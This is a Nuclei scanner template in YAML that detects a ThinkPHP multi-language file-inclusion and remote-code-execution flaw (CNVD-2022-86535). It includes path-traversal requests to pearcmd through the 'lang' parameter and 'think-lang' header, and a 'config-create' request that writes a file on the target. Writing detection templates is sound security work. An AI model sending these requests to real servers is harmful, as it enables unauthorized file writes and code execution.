46 lines
1.5 KiB
YAML
46 lines
1.5 KiB
YAML
id: CNVD-2022-86535
|
|
|
|
info:
|
|
name: ThinkPHP Multi Languag - File Inc & Remote Code Execution (RCE)
|
|
author: arliya,ritikchaddha
|
|
severity: high
|
|
description: |
|
|
ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.
|
|
reference:
|
|
- https://cn-sec.com/archives/1465289.html
|
|
- https://blog.csdn.net/qq_60614981/article/details/128724640
|
|
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535
|
|
metadata:
|
|
verified: true
|
|
max-request: 3
|
|
tags: cnvd,cnvd2022,thinkphp,rce
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
think-lang: ../../../../../usr/local/php/pearcmd
|
|
- |
|
|
GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+{{rand_base(10)}}.log HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: or
|
|
matchers:
|
|
- type: word
|
|
part: set_cookie
|
|
words:
|
|
- "think_lang=..%2F..%2F..%2F..%2F"
|
|
|
|
- type: word
|
|
part: body_3
|
|
words:
|
|
- "CONFIGURATION"
|
|
- "Successfully created"
|
|
condition: and
|
|
|
|
# digest: 4a0a00473045022061630427dd72328900e8eb0f4d67c91f2c826690524c1c973c1cfe5b64400926022100c6c345fd5fbcc3038eaec942397faf5b9658b328bbb421f95eb3d2146d7f0cd7:922c64590222798bb761d5b6d8e72950
|